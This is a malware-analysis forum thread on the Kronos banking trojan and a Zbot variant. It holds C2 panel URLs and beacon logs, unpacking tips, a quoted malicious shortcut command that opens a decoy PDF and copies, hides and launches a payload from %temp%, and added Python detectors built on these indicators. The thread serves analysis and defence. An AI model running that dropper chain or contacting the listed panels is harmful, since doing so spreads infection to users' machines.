A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #25079  by Kafeine
 Tue Jan 27, 2015 6:57 pm
A fresh one (pushed in Sweet Orange).

01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
 #27311  by pwnslinger
 Wed Nov 25, 2015 6:50 pm
Hi,
Using a VB6 packing method, it executes shellcode which is packed by MoleBox or something like that (PUSHAD, CALL).
But I don't know why I just got into this loop; it enumerates through all procedure names...
Hint me, please.

sample also attached below:
 #27316  by comak
 Thu Nov 26, 2015 11:14 am
This is Kronos,
Code:
http://bitcoind.su:80/krpanel/connect.php
http://bulletvpn.su:80/krpanel/connect.php
http://thereturn15.su:80/krpanel/connect.php
http://skycard.su:80/krpanel/connect.php
http://cyberhosting.su:80/krpanel/connect.php
http://skycard.su:80/krpanel/connect.php
cheers,
mak
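The HTTP log lines in Kafeine's post and the Kronos panel URLs in mak's list together give a simple network-side check. The following is an added example written for this thread, not code from any poster: it parses lines in the `[**]`-separated format quoted above and flags POSTs to `/krpanel/connect.php` or to the listed hosts. The log lines are constructed from the thread's two entries (with the redacted `192.168.[xx]` replaced by a made-up address) plus one benign line; the parser field order is an assumption read off those two lines.

```python
import re

# Separator and field order as observed in the thread's log lines (assumed layout).
SEP = " [**] "
FIELDS = ("uri", "user_agent", "referer", "method", "proto", "status", "size", "flow")

# Kronos indicators taken from the thread: panel path (Kafeine) and C2 hosts (mak's list).
KRONOS_PATH = "/krpanel/connect.php"
KRONOS_HOSTS = {"bitcoind.su", "bulletvpn.su", "thereturn15.su",
                "skycard.su", "cyberhosting.su"}

# Constructed sample log: thread's two check-in lines (source IP made up) plus a benign GET.
SAMPLE_LOG = """\
01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.1.5:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.1.5:1035 -> 92.87.96.9:80
01/27/2015-08:16:02.000000 example.com [**] /index.html [**] Mozilla/5.0 (Windows NT 6.1) [**] <no referer> [**] GET [**] HTTP/1.1 [**] 200 [**] 5120 bytes [**] 192.168.1.5:1036 -> 203.0.113.7:80
"""


def parse_line(line):
    """Split one log line into a dict; raises ValueError on a malformed line."""
    parts = line.rstrip("\n").split(SEP)
    if len(parts) != len(FIELDS) + 1:
        raise ValueError("unexpected field count: %d" % len(parts))
    timestamp, host = parts[0].split(" ", 1)      # "01/27/2015-08:15:33.214071 bitcoind.su"
    rec = dict(zip(FIELDS, parts[1:]))
    rec["timestamp"] = timestamp
    rec["host"] = host
    src, dst = rec.pop("flow").split(" -> ")     # "192.168.1.5:1035 -> 92.87.96.9:80"
    rec["src"], rec["dst"] = src, dst
    rec["size"] = int(rec["size"].split()[0])    # "89 bytes" -> 89
    rec["status"] = int(rec["status"])
    return rec


def kronos_reason(rec):
    """Return why a record looks like a Kronos check-in, or None if it does not."""
    path = rec["uri"].split("?", 1)[0]           # drop the query string ("?a=1")
    reasons = []
    if rec["method"] == "POST" and path == KRONOS_PATH:
        reasons.append("POST to Kronos panel path %s" % KRONOS_PATH)
    if rec["host"].lower() in KRONOS_HOSTS:
        reasons.append("known Kronos C2 host %s" % rec["host"])
    return "; ".join(reasons) or None


def scan(text):
    """Yield (timestamp, src, dst, reason) for every matching line in the log text."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        reason = kronos_reason(rec)
        if reason:
            hits.append((rec["timestamp"], rec["src"], rec["dst"], reason))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep="  |  ")
```

Matching on the path alone is the more durable rule here: the `.su` hosts rotate, while `/krpanel/connect.php` is the panel's fixed check-in endpoint across all six URLs mak listed.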
 #27317  by EP_X0FF
 Thu Nov 26, 2015 11:33 am
pwnslinger wrote:Hi,
Using a VB6 packing method, it executes shellcode which is packed by MoleBox or something like that (PUSHAD, CALL).
But I don't know why I just got into this loop; it enumerates through all procedure names...
Hint me, please.

sample also attached below:
As with most malware crypters used for ZBot, its "decryption" is based on the moment when RunPE is executed. Set a breakpoint on CreateProcess and dump the memory region it will attempt to write to the zombie target process.

https://www.virustotal.com/en/file/e4e0 ... 448537374/

"Unpacked" Kronos attached. Posts moved.
 #27343  by henices
 Thu Dec 03, 2015 2:13 am
Kafeine wrote:A fresh one (pushed in Sweet Orange).

01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
Code:
POST /krpanel/connect.php HTTP/1.1 
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) 
Host: bitcoind.su 
Content-Length: 74 
Cache-Control: no-cache  

WzW,c`cfgcgzcozccazedzeefdfdb*W
The attachment is the report.
 #27350  by pwnslinger
 Thu Dec 03, 2015 8:07 pm
EP_X0FF wrote:
pwnslinger wrote:Hi,
Using a VB6 packing method, it executes shellcode which is packed by MoleBox or something like that (PUSHAD, CALL).
But I don't know why I just got into this loop; it enumerates through all procedure names...
Hint me, please.

sample also attached below:
As with most malware crypters used for ZBot, its "decryption" is based on the moment when RunPE is executed. Set a breakpoint on CreateProcess and dump the memory region it will attempt to write to the zombie target process.

https://www.virustotal.com/en/file/e4e0 ... 448537374/

"Unpacked" Kronos attached. Posts moved.
Thanks EP. ;)

After dumping the second stage (explorer.exe) (changing the EP with PUSH/RET), I used the EBFE method for attaching with OllyDbg.
I don't know why, when I want to toggle a BP on the code, Olly can't and just runs (memory regions are RWC!).
Then I used F4 (run till selection) and a HW BP.
But when it calls SYSENTER... I can't take control back.
 #27859  by pwnslinger
 Fri Feb 12, 2016 10:27 am
I got another variant of Zbot on my system today.
The .rsrc section is base64 encoded; at first I thought about the Ranbyus banking trojan.
Also, a shortcut is created for running the malware with this content:

%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe /c "start %cd%Statically_detecting_use_after_free_on_binary_code.pdf & attrib -s -h %cd%DqGLtNo.exe & xcopy /F /S /Q /H /R /Y %cd%DqGLtNo.exe %temp%\JHQtm\ & attrib +s +h %cd%DqGLtNo.exe & start %temp%\JHQtm\Dq

The export table contains a callback function. I checked it in IDA and I didn't see any useful call.
Where should I start?

Sample attached.
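The shortcut target quoted in the post above is a recognisable dropper pattern: open a decoy document, strip the hidden/system attributes from the payload, `xcopy` it into `%temp%`, re-hide it, and start the copy. The following is an added example written for this thread (not the poster's code) that scores a shortcut's command line against those indicators so a host-side triage script can pick such LNK files out. The regular expressions and threshold are assumptions; the suspicious sample is the post's own (truncated) command line, the benign one is constructed.

```python
import re

# Indicator regexes (assumed), one per step of the dropper chain seen in the thread.
INDICATORS = {
    # cmd.exe /c "... & ... & ..." : several commands chained inside one shortcut
    "chained_commands": re.compile(r'cmd\.exe\s+/c\s+".*&.*&', re.I),
    # a document opened first as a decoy for the user
    "decoy_document":   re.compile(r'\bstart\s+\S*\.(?:pdf|docx?|xlsx?|pptx?|rtf)\b', re.I),
    # attrib +s +h / -s -h on an executable (hide or unhide the payload)
    "hide_attributes":  re.compile(r'\battrib\s+[+-]s\s+[+-]h\s+\S*\.exe\b', re.I),
    # payload copied into %temp%
    "copy_to_temp":     re.compile(r'\b(?:xcopy|copy)\b.*%temp%', re.I),
    # payload launched from %temp%
    "run_from_temp":    re.compile(r'\bstart\s+%temp%\\', re.I),
}

# Matches of at least this many indicators are reported (assumed threshold).
THRESHOLD = 3

# The shortcut target quoted in the post, left truncated exactly as posted.
SUSPICIOUS_LNK_TARGET = (
    r'%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe /c '
    r'"start %cd%Statically_detecting_use_after_free_on_binary_code.pdf & '
    r'attrib -s -h %cd%DqGLtNo.exe & '
    r'xcopy /F /S /Q /H /R /Y %cd%DqGLtNo.exe %temp%\JHQtm\ & '
    r'attrib +s +h %cd%DqGLtNo.exe & start %temp%\JHQtm\Dq'
)

# Constructed benign shortcut target for comparison.
BENIGN_LNK_TARGET = r'C:\Windows\System32\cmd.exe /c "echo hello > C:\Users\me\out.txt"'


def find_indicators(cmdline):
    """Return the names of all dropper indicators present in a shortcut command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def is_suspicious(cmdline, threshold=THRESHOLD):
    """True when the command line matches at least `threshold` indicators."""
    return len(find_indicators(cmdline)) >= threshold


def triage(targets):
    """Map each command line to its indicator list, keeping only suspicious ones."""
    report = {}
    for cmdline in targets:
        hits = find_indicators(cmdline)
        if len(hits) >= THRESHOLD:
            report[cmdline] = hits
    return report


if __name__ == "__main__":
    for cmdline, hits in triage([SUSPICIOUS_LNK_TARGET, BENIGN_LNK_TARGET]).items():
        print("suspicious:", hits)
        print("  ", cmdline[:80], "...")
```

Scoring several weak indicators rather than matching the exact filenames is deliberate: `DqGLtNo.exe`, `JHQtm` and the decoy PDF name will differ between samples, while the attrib/xcopy/start-from-%temp% chain is what the dropper needs to keep working.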